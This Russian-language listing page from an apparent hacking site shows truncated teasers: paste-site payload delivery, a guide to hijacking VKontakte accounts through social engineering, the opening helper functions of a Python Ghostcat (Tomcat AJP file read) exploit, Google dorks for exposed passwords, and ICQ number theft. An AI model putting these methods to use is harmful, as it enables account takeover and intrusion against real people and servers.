Малварь загружает payload с paste-сайтов
Эксперты компании Juniper выявили многочисленные вредоносные кампании, которые используют для доставки
полезной нагрузки paste-сайты (вместо обычных C&C-серверов). Таким
образом хакеры прячут свой вредоносный код у всех на виду и, в числе
прочего, экономят на инфраструктуре.
Исследователи пишут, что злоумышленники используют легитимные paste-
сервисы, подобные paste.nrecom[.]net, для размещения своих пейлоадов. К
примеру, этот сервис основан на опенсорсной имплементации Pastebin,
которая... Вирусы // 08.10.2020 // Просмотров: 1311 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Пошаговое руководство по взлому страницы ВКонтакте
В статье приводится несколько возможных способов взлома ВКонтакте,
ориентированных на людей, недалёких в компьютерной безопасности.
Иными словами, при взломе будут использоваться не машинные, а
человеческие уязвимости. Естественно, приведённые методы не универсальны
(и слава богу!), и у кого-то может хватить мозгов на то, чтобы не
поддаваться на ваши провокации. Но таких не так уж много, поверьте.
Итак, начнём. Прежде всего, перед началом вам понадобятся страница,
которую вы... Взлом // 04.10.2020 // Просмотров: 2554 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion #!/usr/bin/env python
#CNVD-2020-10487 Tomcat-Ajp lfi
#by ydhcui
import struct
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
size = struct.calcsize(fmt)
buf = stream.read(size)
return struct.unpack(fmt, buf)
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return... Web apps // 01.03.2020 // Просмотров: 3468 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Поиск уязвимых служб и паролей в открытых логах в Гугле при помощи дорков
Поскольку Гугл индексирует практически все, что подключено к
интернету и имеет веб-интерфейс, мы легко можем найти некорректно
настроенные устройства и службы.
Автор: Kody
Вероятно, вы и не подозревали, что дорки могут оказаться очень мощным
инструментом, при помощи которого можно скомпрометировать устройство без
лишних телодвижений, используя Гугл и правильный запрос. Поскольку эта
поисковая система умеет фантастическим образом индексировать все, что
подключено к интернету... Взлом // 17.02.2020 // Просмотров: 3514 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Охота за UINом - Bugs, Crack и Social Ingineering
Иван Миловидов aka KOT, [email protected]Эпилог:"Mirabilis, the Israeli company that developed ICQ,
states that the free system was not designed for "mission critical"
or "content sensitive" communications..."
Итак я вышел на тропу войны: хочу быть смелым и красивым, с шестизначным UIN номером и что б все поняли что миллионные числа это не серьезно, вот посмотрите на меня - я был одним из первых пользователей или неважно кем я был, важнее кем я стал. А как я стал, сейчас расскажу:1. Приходи кто... Архив // 15.06.2008 // Просмотров: 25595 // Рейтинг: 5 // Комментариев: 1
«-----------------------------------» |